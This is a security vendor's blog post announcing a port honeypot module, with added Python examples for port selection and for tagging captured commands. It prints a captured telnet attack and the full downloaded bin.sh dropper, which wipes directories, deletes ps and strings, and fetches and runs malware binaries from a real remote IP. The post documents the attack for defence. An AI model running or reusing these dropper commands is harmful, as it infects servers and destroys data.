Port HoneyPot is ready for action

Viktoria Vereb

A long time ago, in a galaxy far, far away … Ohh wait, it’s just happening. Yeah, one of the most anticipated ninja modules, the ‘gorgeous’ Port Honeypot, has been released. I know what you are thinking now: “How can it be gorgeous? Seriously, this is about a security function.” Let me introduce you to this sexy component of the ninja protection; even Winnie the Pooh can’t say no to it.

More about Port Honeypot

This is a general honeypot module. Once activated, it sets up 100 honeypots on your server on random ports chosen from the 1,000 most popular ports. It detects when someone runs a deep port scan against your server (except SYN stealth scans and some others), and it also captures any traffic arriving on these honeypots, so when an attacker tries to exploit one of the fake services, an incident is generated. This is a very effective way to catch attacks and botnet activity early.

Port Honeypot does not bind on the actual ports; it binds on a port above 60,000 and uses iptables rules to forward traffic from the actual ports. We do this so that no port is ever blocked for a real service. If a daemon starts listening on a honeypot port, the module automatically stops using that port as a honeypot. When the module starts, it also lists all open sockets in listening mode and won’t start a honeypot on an active port. This way the module automatically avoids any collision with real services. If you want, you can set ports that should always be used for honeypot purposes, and you can set ports that should never be used as a honeypot.
Read more about how to configure this module, and about the chat scripts that can be used to fake services even more realistically >> Yeah, let’s go to the documentation
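To make the port-selection logic described above concrete, here is an added example (not BitNinja’s own code) of how a honeypot could pick its ports and generate the matching iptables redirects. It assumes `ss -ltn`-style output for the listening sockets, a small stand-in for the popular-port pool, and one sequential high port per honeypot above 60,000; the sample data is constructed.

```python
import random
import re

# Constructed `ss -ltn` output (not from a real server): services that are
# already listening and must never be shadowed by a honeypot.
SS_OUTPUT = """\
State   Recv-Q  Send-Q  Local Address:Port  Peer Address:Port
LISTEN  0       128     0.0.0.0:22          0.0.0.0:*
LISTEN  0       128     127.0.0.1:3306      0.0.0.0:*
LISTEN  0       511     *:80                *:*
LISTEN  0       511     [::]:443            [::]:*
"""

# Stand-in for the "1,000 most popular ports" pool; a real list is far longer.
POPULAR_PORTS = [21, 22, 23, 25, 80, 110, 143, 443, 445, 1433, 3306, 3389, 5900, 8080]

HIGH_BASE = 60000  # honeypot listeners live above this, as the post describes


def listening_ports(ss_text):
    """Collect local TCP ports in LISTEN state from `ss -ltn`-style output."""
    ports = set()
    for line in ss_text.splitlines():
        fields = line.split()
        if len(fields) >= 4 and fields[0] == "LISTEN":
            m = re.search(r":(\d+)$", fields[3])
            if m:
                ports.add(int(m.group(1)))
    return ports


def choose_honeypot_ports(candidates, in_use, always=(), never=(), count=100, seed=None):
    """Forced 'always' ports first, then random popular ports; anything already
    listening or on the 'never' list is skipped, so real services keep their port."""
    chosen = [p for p in always if p not in in_use]
    blocked = set(in_use) | set(never) | set(chosen)
    pool = [p for p in candidates if p not in blocked]
    random.Random(seed).shuffle(pool)
    chosen.extend(pool[: max(0, count - len(chosen))])
    return sorted(chosen)


def redirect_rules(ports, high_base=HIGH_BASE):
    """One nat PREROUTING REDIRECT per honeypot: the real port stays unbound and
    traffic lands on a sequential high port where the fake service listens."""
    return [
        f"iptables -t nat -A PREROUTING -p tcp --dport {p} "
        f"-j REDIRECT --to-ports {high_base + i}"
        for i, p in enumerate(sorted(ports), start=1)
    ]
```

Because the honeypot never binds the real port, removing the nat rule is enough to hand a port back to a service that starts listening later.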

(For customers: The new feature version is out, ready to manually update. We will auto update it for you on Thursday.)

Fun facts

We have captured more than 10 000 incidents on 5 test servers with this new module.

{
"PORT HIT": "189.14.202.110:51313->178.22.62.146:23",
"MESSAGES": "Array
(
[21:39:23] => sh

[21:39:27] => cd /tmp || cd /var/run || cd /dev/shm || cd /mnt || cd /var;rm -f *;mv -f /usr/bin/-wget /usr/bin/wget;mv -f /usr/sbin/-wget /usr/bin/wget;mv -f /bin/-wget /bin/wget;mv -f /sbin/-wget /bin/wget;wget http://74.118.193.239/bin.sh; sh bin.sh; wget1 http://74.
[21:39:30] => cd /tmp || cd /var/run || cd /dev/shm || cd /mnt || cd /var;rm -f *;mv -f /usr/bin/-wget /usr/bin/wget;mv -f /usr/sbin/-wget /usr/bin/wget;mv -f /bin/-wget /bin/wget;mv -f /sbin/-wget /bin/wget;wget http://74.118.193.239/bin.sh; sh bin.sh; wget1 http://74.


This is a good example of a malicious request captured by the Port HoneyPot module. You can clearly see that the attacker first tries to run a shell (sh) and then a long command. The long command does basically this:

  1. Try to cd into one of /tmp, /var/run, /dev/shm, /mnt or /var, whichever works first.
  2. Move the /usr/bin/-wget executable to /usr/bin/wget, and try the same with /usr/sbin/-wget, /bin/-wget and /sbin/-wget.
  3. Using wget, download a script from the given C&C server and execute it with the default shell interpreter.
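The three stages above are exactly what a detection routine can look for in a honeypot capture. The following is an added example, not part of the post or the BitNinja module: it parses the `[HH:MM:SS] => command` entries shown in the incident, tags each command with the stage it matches, and extracts download URLs as indicators. The capture is constructed and uses a TEST-NET placeholder host instead of the real one.

```python
import re

# Constructed honeypot capture modelled on the incident in the post; the
# download host is a TEST-NET placeholder, not a real indicator.
CAPTURE = """\
[21:39:23] => sh
[21:39:27] => cd /tmp || cd /var/run || cd /dev/shm || cd /mnt || cd /var;rm -f *;mv -f /usr/bin/-wget /usr/bin/wget;wget http://203.0.113.10/bin.sh; sh bin.sh
"""

ENTRY_RE = re.compile(r"^\[(\d\d:\d\d:\d\d)\] => (.*)$")
URL_RE = re.compile(r"https?://[^\s;'\"]+")

# One tag per stage the post walks through; list order is the report order.
INDICATORS = [
    ("writable_dir_hop", re.compile(r"cd /tmp \|\| cd /var/run|cd /dev/shm")),
    ("wipe_dir", re.compile(r"\brm -f \*")),
    ("restore_wget", re.compile(r"mv -f \S*/-wget \S*/wget")),
    ("download", re.compile(r"\b(?:wget|curl|tftp)\b")),
    ("execute", re.compile(r"(?:sh|bash) \S+\.sh|chmod \+x")),
]


def parse_capture(text):
    """Turn '[HH:MM:SS] => command' lines into (timestamp, command) pairs."""
    entries = []
    for line in text.splitlines():
        m = ENTRY_RE.match(line.strip())
        if m:
            entries.append((m.group(1), m.group(2)))
    return entries


def analyse(text):
    """Tag every captured command, extract download URLs as IoCs and flag the
    session as a dropper when a download and an execution both appear."""
    findings, urls = [], set()
    for ts, cmd in parse_capture(text):
        tags = [tag for tag, rx in INDICATORS if rx.search(cmd)]
        urls.update(URL_RE.findall(cmd))
        findings.append({"time": ts, "tags": tags, "command": cmd})
    seen = {t for f in findings for t in f["tags"]}
    return {
        "dropper": {"download", "execute"} <= seen,
        "urls": sorted(urls),
        "findings": findings,
    }
```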

What is inside the bin.sh script? We have downloaded this script for you:

#!/bin/bash
rm -f *
busybox rm -rf /tmp/*
busybox rm -rf /root/*
busybox rm -rf /usr/bin/strings
busybox rm -rf /usr/bin/ps
busybox wget http://74.118.193.239/10; busybox chmod +x 10; ./10; busybox rm -f 10*
rm -f *
busybox wget http://74.118.193.239/11; busybox chmod +x 11; ./11; busybox rm -f 11*
rm -f *
busybox wget http://74.118.193.239/13; busybox chmod +x 13; ./13; busybox rm -f 13*
rm -f *
busybox wget http://74.118.193.239/14; busybox chmod +x 14; ./14; busybox rm -f 14*
rm -f *
busybox wget http://74.118.193.239/15; busybox chmod +x 15; ./15; busybox rm -f 15*
rm -f *
busybox wget http://74.118.193.239/16; busybox chmod +x 16; ./16; busybox rm -f 16*
rm -f *
busybox wget http://74.118.193.239/17; busybox chmod +x 17; ./15; busybox rm -f 17*
rm -f *

busybox wget http://74.118.193.239/10; busybox cp /bin/busybox ./; busybox cat 10 > busybox; busybox rm -f 10; busybox cp busybox 10; busybox rm -f busybox; ./10; busybox rm -f 10*
rm -f *
busybox wget http://74.118.193.239/11; busybox cp /bin/busybox ./; busybox cat 11 > busybox; busybox rm -f 11; busybox cp busybox 11; busybox rm -f busybox; ./11; busybox rm -f 11*
rm -f *
busybox wget http://74.118.193.239/13; busybox cp /bin/busybox ./; busybox cat 13 > busybox; busybox rm -f 13; busybox cp busybox 13; busybox rm -f busybox; ./13; busybox rm -f 13*
rm -f *
busybox wget http://74.118.193.239/14; busybox cp /bin/busybox ./; busybox cat 14 > busybox; busybox rm -f 14; busybox cp busybox 14; busybox rm -f busybox; ./14; busybox rm -f 14*
rm -f *
busybox wget http://74.118.193.239/15; busybox cp /bin/busybox ./; busybox cat 15 > busybox; busybox rm -f 15; busybox cp busybox 15; busybox rm -f busybox; ./15; busybox rm -f 15*
rm -f *
busybox wget http://74.118.193.239/16; busybox cp /bin/busybox ./; busybox cat 16 > busybox; busybox rm -f 16; busybox cp busybox 16; busybox rm -f busybox; ./16; busybox rm -f 16*
rm -f *
busybox wget http://74.118.193.239/17 busybox cp /bin/busybox ./; busybox cat 17 > busybox; busybox rm -f 17; busybox cp busybox 17; busybox rm -f busybox; ./17; busybox rm -f 17*
rm -f *

exit


So, the next question is: what do http://74.118.193.239/10 and the other 7 files contain? We have downloaded them, too. They are malware/virus files. The bin.sh script downloads and executes them, then deletes the files themselves, but the viruses remain in memory.

This is a good example of an attack that the BitNinja Port Honeypot can automatically protect your server against.

Happy hacker hunting! BitNinja will always be there for you.

Sign up for the 7-day BitNinja trial, and let the Port HoneyPot get the hunting party started.
